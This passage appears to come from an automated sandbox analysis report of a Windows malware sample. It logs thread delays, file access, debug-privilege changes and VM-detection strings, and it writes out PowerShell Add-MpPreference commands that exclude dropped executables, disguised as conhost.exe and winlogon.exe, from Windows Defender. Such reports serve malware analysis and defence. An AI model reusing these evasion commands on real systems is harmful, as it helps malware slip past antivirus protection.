Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\VTixufCejPQZEvXiB.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\AccountPictures\winlogon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 599781
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 598843
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 598625
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 598500
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 598343
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 3600000
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 597578
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 597359
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 597208
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 597068
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 596906
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 596761
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 596640
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 300000
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 596468
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 596347
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 596218
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 596108
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 595988
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 595859
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 595721
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 595580
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 595125
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 594822
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 594669
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 594495
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 594387
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 594278
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 594171
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 594062
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 593950
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 593842
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 593734
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 593625
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 593509
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 593399
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 593296
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 593187
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 593078
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 592968
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 592859
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 592726
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 592512
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 591978
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 591858
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 591749
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 591640
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 591528
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 591420
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 591309
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 591177
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 591048
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 590916
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 590773
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 590656
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 590546
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 590437
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 590326
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 590201
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 590093
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\4si9noTBNw.exe | File opened: C:\Users\user\AppData\Local
Source: conhost.exe.0.dr | Binary or memory string: Npj6rKbVmcI0q3q9CKlU
Source: 4si9noTBNw.exe, 00000000.00000002.1825343153.000000001BD56000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}sses\C
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Process token adjusted: Debug
Source: C:\Users\Public\AccountPictures\winlogon.exe | Process token adjusted: Debug
Source: C:\Users\Public\AccountPictures\winlogon.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process token adjusted: Debug
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Process token adjusted: Debug
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Process token adjusted: Debug
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\VTixufCejPQZEvXiB.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\VTixufCejPQZEvXiB.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\winlogon.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\en-GB\conhost.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4si9noTBNw.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\VTixufCejPQZEvXiB.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\VTixufCejPQZEvXiB.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\winlogon.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\en-GB\conhost.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4si9noTBNw.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline"
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\VTixufCejPQZEvXiB.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\VTixufCejPQZEvXiB.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\winlogon.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\en-GB\conhost.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4si9noTBNw.exe'
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\csCDqY6YZN.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES39B.tmp" "c:\Windows\System32\CSC5AB1265740184DDC93ABA6EF26458DB.TMP"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\en-GB\conhost.exe "C:\Program Files\Windows Defender\en-GB\conhost.exe"
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Users\user\Desktop\4si9noTBNw.exe VolumeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Queries volume information: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe VolumeInformation
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Queries volume information: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe VolumeInformation
Source: C:\Users\Public\AccountPictures\winlogon.exe | Queries volume information: C:\Users\Public\AccountPictures\winlogon.exe VolumeInformation
Source: C:\Users\Public\AccountPictures\winlogon.exe | Queries volume information: C:\Users\Public\AccountPictures\winlogon.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
